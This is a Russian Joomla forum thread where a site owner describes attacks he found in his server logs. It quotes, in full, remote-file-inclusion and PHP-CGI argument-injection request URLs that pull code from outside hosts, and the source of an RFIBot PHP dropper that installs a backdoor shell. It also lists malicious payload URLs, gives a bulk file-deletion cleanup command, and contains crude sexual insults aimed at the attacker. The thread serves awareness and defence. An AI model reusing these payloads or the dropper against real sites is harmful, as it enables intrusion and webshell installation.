Рубрики
Контакты
В блоге
×
Masterpro Nivo Slider (06 фев 2023)
Это форк Vinaora Nivo Slider, пришлось переименовать, в силу требования JED. Даже старую версию качать можно было только с варезных сайтов, нашпигованную троянами. Зачем оно такое, согласитесь.
Вопрос Как взламывали Masterpro.ws
10 года 1 мес. назад - 10 года 2 дн. назад #1
от Aleksej
Aleksej создал тему: Как взламывали Masterpro.ws
Оговорюсь сразу; есть планы сделать из небольшого этого сообщения - развернутую статью, предназначенную спецом для тех, кто только-только начинает изучать php либо основы интернет-security. Но пока, в рамках данного топика - лишь перечень предпринятых атак, в основе которых лежит манипулирование get-запросами и попытка удаленного включения некоего скрипта (include), образец которого также приведен.
Оговорка вторая: автор никому и ни в коей мере не рекомендует использовать описанный механизм атак... все, что вы здесь видите - представлено лишь с целью ознакомления. Иными словами - вы читаете данный текст лишь затем, чтобы понять, как делать не нужно.
Не нужно - в силу ряда причин; прежде всего - это не только незаконно, но и представляет из себя, так сказать, моветон маловоспитанного человека и полуграмотного кулхацкера, мнящего себя интернет-гением. Не нужно потому, что, применяя даннный механизм - вы расписываетесь в собственном неумении и непрофессионализме; вы открыто признаете, что более серьезная работа, не базирующаяся на попытках поиска давно закрытых дырок и уязвимостей безопасности - вам не по зубам.
Собственно, предисловие на этом закончено и переходим к деталям. Взгляните, они достаточно поучительны.
Итак, неизвестный злоумышленник предпринимает попытки удаленного включения файла... или, вероятно, попросту пытается прощупать php-директивы неизвестного хостинга:
Это могло быть даже вот так:
или так:
Самые любознательные могут набрать в Google что-нибудь вроде поисковой фразы "E-Store SQL Injection Vulnerability", а также по приведенной ссылке загрузить, раскодировать из base64 и попробовать осмыслить содержимое файла с расширением php. Это довольно познавательно.
Или же - можно попытаться отыграть в сторону JCE (очень немало уязвимостей, к слову, этот редактор в свое время мог содержать в своих скриптах, просто на удивление дырявый) либо VirtueMart:
К слову, приходится в очередной раз обратить внимание джумлаводов на то обстоятельство, с каким перманентным постоянством любимый многими JCE-редактор то и дело содержит крайне опасные уязвимости... мне казалось, что так было когда-то, но взгляните, относительно свежие вести с полей и сегодня в полной мере доступны на сайте разработчика либо в виде вот такого рода сообщений на различных интернет-форумах:
Что именно инклюдится? - вариантов немало. Вы и сами можете, вообщем, взглянуть по содержащимся в коде ссылкам... только не забывайте, содержимое этих скриптов может меняться. Я же здесь приведу самый короткий код из всего увиденного... "Бегемот, покажи нам для начала что-нибудь простенькое", одним словом... взгляните, в случае, если бы попытка удаленного включения такого рода увенчалась успехом - злоумышленник получает полный веб-шелл к вашему аккаунту:
Ну, что же. В преддверии, как уже было сказано, развернутой статьи на тему - буду рад выслушать замечания в контексте приведенных примеров. Если они будут.
Оговорка вторая: автор никому и ни в коей мере не рекомендует использовать описанный механизм атак... все, что вы здесь видите - представлено лишь с целью ознакомления. Иными словами - вы читаете данный текст лишь затем, чтобы понять, как делать не нужно.
Не нужно - в силу ряда причин; прежде всего - это не только незаконно, но и представляет из себя, так сказать, моветон маловоспитанного человека и полуграмотного кулхацкера, мнящего себя интернет-гением. Не нужно потому, что, применяя даннный механизм - вы расписываетесь в собственном неумении и непрофессионализме; вы открыто признаете, что более серьезная работа, не базирующаяся на попытках поиска давно закрытых дырок и уязвимостей безопасности - вам не по зубам.
Собственно, предисловие на этом закончено и переходим к деталям. Взгляните, они достаточно поучительны.
Итак, неизвестный злоумышленник предпринимает попытки удаленного включения файла... или, вероятно, попросту пытается прощупать php-директивы неизвестного хостинга:
http://masterpro.ws/?-d+safe_mode=Off+-d+disable_functions=NULL+-d+allow_url_fopen=On+-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txt
http://masterpro.ws/?-d+safe_mode=Off+-d+disable_functions=NULL+-d+allow_url_fopen=On+-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txt+-nЭто могло быть даже вот так:
http://masterpro.ws/?-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txtили так:
http://www.masterpro.ws/wp-content/themes/eStore/timthumb.php?src=http://picasa.com.rnt.ca/bat.phpСамые любознательные могут набрать в Google что-нибудь вроде поисковой фразы "E-Store SQL Injection Vulnerability", а также по приведенной ссылке загрузить, раскодировать из base64 и попробовать осмыслить содержимое файла с расширением php. Это довольно познавательно.
Или же - можно попытаться отыграть в сторону JCE (очень немало уязвимостей, к слову, этот редактор в свое время мог содержать в своих скриптах, просто на удивление дырявый) либо VirtueMart:
http://www.masterpro.ws/forum//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://picasa.com.buscadordetrabajo.es/cybercrime.php
http://www.masterpro.ws/forum&sa=U&ei=THucUo71L8igtAaC8YCACA&ved=0CJABEBYwFjjIAQ&usg=AFQjCNFc40vYLvdtMx_iyBKU9-St1kri2A//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.php
http://www.masterpro.ws/forum/virtuemart//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://picasa.com.buscadordetrabajo.es/cybercrime.php
http://www.masterpro.ws/forum/virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.grxuy.com/vv??
http://www.masterpro.ws//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://caoc.cat/idr??К слову, приходится в очередной раз обратить внимание джумлаводов на то обстоятельство, с каким перманентным постоянством любимый многими JCE-редактор то и дело содержит крайне опасные уязвимости... мне казалось, что так было когда-то, но взгляните, относительно свежие вести с полей и сегодня в полной мере доступны на сайте разработчика либо в виде вот такого рода сообщений на различных интернет-форумах:
В последнее время участились случаи взлома сайтов на Joomla, использующих компонент Joomla Content Editor (com_jce).
Этот компонент имеет уязвимость вплоть до версии 2.0.10, которая позволяет злоумышленнику загружать на сайт произвольные файлы, в том числе, скрипты php.
Для заражения злоумышленники используют робота, который сканирует сайты на предмет наличия компонента jce и имеющейся в нём уязвимости. Наиболее часто встречающиеся симптомы такого заражения:
файлы wp-conf.php в корневой директории сайта ./public_html и в корневой директории аккаунта
файл со случайным названием вида w7792289n.php в ./public_html
многочисленные файлы index.php, залитые в случайные директории сайта
файлы с произвольным названием, в т.ч. с вполне осмысленным, залитые в случайные директории сайта.
Модификация файлов сайта в этом случае не производится, и зловредные файлы легко вычислить по дате изменения. Например, если взлом был осуществлён неделю назад, и если за эту неделю на сайте не менялись php-скрипты, то лечение сводится к следующей команде:
cd public_html
find . -type f -mtime -7 -name "*.php" -delete
Для предотвращения повторного взлома через эту уязвимость следует обновить компонент JCE.
Что именно инклюдится? - вариантов немало. Вы и сами можете, вообщем, взглянуть по содержащимся в коде ссылкам... только не забывайте, содержимое этих скриптов может меняться. Я же здесь приведу самый короткий код из всего увиденного... "Бегемот, покажи нам для начала что-нибудь простенькое", одним словом... взгляните, в случае, если бы попытка удаленного включения такого рода увенчалась успехом - злоумышленник получает полный веб-шелл к вашему аккаунту:
<html><style>
body {font:10pt tahoma;color:#ff0000;background:black;margin:4;font-weight:bold;}
</style><body>
<?php
###[ MQ SPREAD for RFIBot (2.3) ]###
error_reporting(0);
##### CONFIG #####
$mode = $_GET["mode"];
$url = 'http://amaecs.com/v/'; //URL path
$src = $url.'com'; //Source Shell
$shell = 'null.php'; //Backdoor PHPShell name
$bot = $url.'bot'; //Source PHPBot
##### SPREAD #####
switch ($mode) {
case "bot":
include($bot);
break;
default:
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
if(file_exists($exec)){
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
}
if(!copy($src,$exec)){
die(base64_decode('TVEgU2hlbGx6Og==').' '.$exec.' Failed!');
}
else {
echo base64_decode('TVEgU2hlbGx6Og==').' '.$exec.' Created!';
}
break;
}
?>
</body></html>
<?php die(); ?>Ну, что же. В преддверии, как уже было сказано, развернутой статьи на тему - буду рад выслушать замечания в контексте приведенных примеров. Если они будут.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
9 года 10 мес. назад #6
от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Продолжение хроники пикирующего бомбардировщика.
Атаки продолжаются. Все столь же тупые и безрезультатные. Впрочем, судя по приведенному ниже синтаксису - атаки начинает принимать адресный характер; в get-запросах мелькает название шаблона и адрес вот этой самой странички. Кажется, некий анонимный неудачник-двоечник начинает проецировать негатив уже целенаправленно на этот самый сайт, оказавшийся ему явно не по зубам и совершенно не по способностям... негатив в Глобальной Сети - весьма забавная штука; берет начало, как мне кажется, от несколько более успешных попыток подрачить на маменьку в раннем своем детстве.
Я уж думаю, не подсказать ли, в каком направлении порыть, чтобы хоть как-то помочь взломать этот сайт и хоть как-то бедолаге наконец кончить. Впрочем, означенный кулхацкер настолько недееспособен, что навряд ли сумеет эту подсказку понять... я уж не говорю про остальное. Что же, мне остается только поблагодарить за контент для данного топика и пожелать дальнейших успехов... кстати, пользуясь случаем, хотелось бы передать привет его дражайшей маменьке. Интересно, она сейчас все так же игрива, как и в ранней молодости?
Атаки продолжаются. Все столь же тупые и безрезультатные. Впрочем, судя по приведенному ниже синтаксису - атаки начинает принимать адресный характер; в get-запросах мелькает название шаблона и адрес вот этой самой странички. Кажется, некий анонимный неудачник-двоечник начинает проецировать негатив уже целенаправленно на этот самый сайт, оказавшийся ему явно не по зубам и совершенно не по способностям... негатив в Глобальной Сети - весьма забавная штука; берет начало, как мне кажется, от несколько более успешных попыток подрачить на маменьку в раннем своем детстве.
http://www.masterpro.ws/component/mailto/%3ftmpl=component%26template=jsn_epic_pro%26link=db87c931bb7a536acabfcd10017daed6400d8acf//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.phphttp://masterpro.ws/forum/25-bezopasnost-sajta-na-joomla/4549-kak-vzlamyvali-masterpro-ws&sa=U&ei=0pPeUuCDFYbOyAGrj4DgCg&ved=0CMUBEBYwJg&usg=AFQjCNHPknpVA9obE1QT0XBxBHTGI9UGdA//wp-content//themes/eStore/timthumb.php?src=http://wordpress.com.xxxvideos.cc/wp-force.phpЯ уж думаю, не подсказать ли, в каком направлении порыть, чтобы хоть как-то помочь взломать этот сайт и хоть как-то бедолаге наконец кончить. Впрочем, означенный кулхацкер настолько недееспособен, что навряд ли сумеет эту подсказку понять... я уж не говорю про остальное. Что же, мне остается только поблагодарить за контент для данного топика и пожелать дальнейших успехов... кстати, пользуясь случаем, хотелось бы передать привет его дражайшей маменьке. Интересно, она сейчас все так же игрива, как и в ранней молодости?
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
9 года 9 мес. назад #9
от savage
savage ответил в теме Как взламывали Masterpro.ws
Гы, рад видеть, что тебя еще пока не взломали, aleksej. Не всем так везет, вот у моего работодателя пару сайтов ломанули недавно.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
9 года 9 мес. назад #10
от Aleksej
Вашими молитвами, savage.
Живем пока, почему бы и нет. Кстати, интенсивность атак сильно снизилась, горе-кулхацкер, походу, выдыхается. А может, мозоли на руках. "Рука бойцов др*чить устала", это если чуть перефразировать классика.
Причем, что интересно. На сайте не одна тысяча страниц... а некоторая, весьма немалая, доля атак нацелена, судя по логам, именно вот на эту самую, с рассказом о бездарном господине, мнящем себя хакером. Не все по зубам такому хакеру, как выясняется.... боги мои, яду мне, яду.. этому чмудаку - joomla, как выясняется, не взломать. Позорище.
Я не раз отмечал (ну, знакомых-то немало по жизни, всяких-разных), что именно такие непризнанные горе-специалисты, перенесшие свои амбиции/обидки из реала в инет - на редкость ранимы, до смешного обидчивы. Это объясняет, по логике вещей, многочисленные get-запросы именно к данной странице... что же, добавим еще одну обидку к длинному перечню уже несправедливо нанесенных. Пришло время опубликовать очередной список сайтов, замеченных в нездоровой активности. Повторюсь, вся инфа выужена из логов, убедиться в ее достоверности несложно; нужно лишь посмотреть, что там такое по ссылке. Проверьте лицензию у вашего Каспера, и вперед. Хотелось бы надеяться, что специалистов "отдела К" той или иной страны данный list рано или поздно заинтересует.
Увы, список совсем небольшой. Вточняк у парня рука отсыхает. Зато сколько протекло меж пальцев удовольствия!
Aleksej ответил в теме Как взламывали Masterpro.ws
savage пишет: Гы, рад видеть, что тебя еще пока не взломали, aleksej. Не всем так везет, вот у моего работодателя пару сайтов ломанули недавно.
Вашими молитвами, savage.
Живем пока, почему бы и нет. Кстати, интенсивность атак сильно снизилась, горе-кулхацкер, походу, выдыхается. А может, мозоли на руках. "Рука бойцов др*чить устала", это если чуть перефразировать классика.
Причем, что интересно. На сайте не одна тысяча страниц... а некоторая, весьма немалая, доля атак нацелена, судя по логам, именно вот на эту самую, с рассказом о бездарном господине, мнящем себя хакером. Не все по зубам такому хакеру, как выясняется.... боги мои, яду мне, яду.. этому чмудаку - joomla, как выясняется, не взломать. Позорище.
Я не раз отмечал (ну, знакомых-то немало по жизни, всяких-разных), что именно такие непризнанные горе-специалисты, перенесшие свои амбиции/обидки из реала в инет - на редкость ранимы, до смешного обидчивы. Это объясняет, по логике вещей, многочисленные get-запросы именно к данной странице... что же, добавим еще одну обидку к длинному перечню уже несправедливо нанесенных. Пришло время опубликовать очередной список сайтов, замеченных в нездоровой активности. Повторюсь, вся инфа выужена из логов, убедиться в ее достоверности несложно; нужно лишь посмотреть, что там такое по ссылке. Проверьте лицензию у вашего Каспера, и вперед. Хотелось бы надеяться, что специалистов "отдела К" той или иной страны данный list рано или поздно заинтересует.
http://woutermesker.nl/nicole/wp-content/php/update.php
http://futterlager.at/modules/mod_jce/joomla.php
http://picasa.com.blackwellbusiness.com/bad.php
http://www.escorindo.com/images/demo.php
http://prometals.co.za/update.php
http://www.atlantahometheatresystems.com/wp-includes/images/id.flv???
http://woutermesker.nl/nicole/wp-content/php/update.php
http://picasa.com.kisahnyata.net/up.php
http://picasa.com.abrivshops.com/ThimThumb.php
http://www.basiakonkel.nl/included/php/content/update.php
http://www.rc-roethis.at/rc/php/joomla.phpУвы, список совсем небольшой. Вточняк у парня рука отсыхает. Зато сколько протекло меж пальцев удовольствия!
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.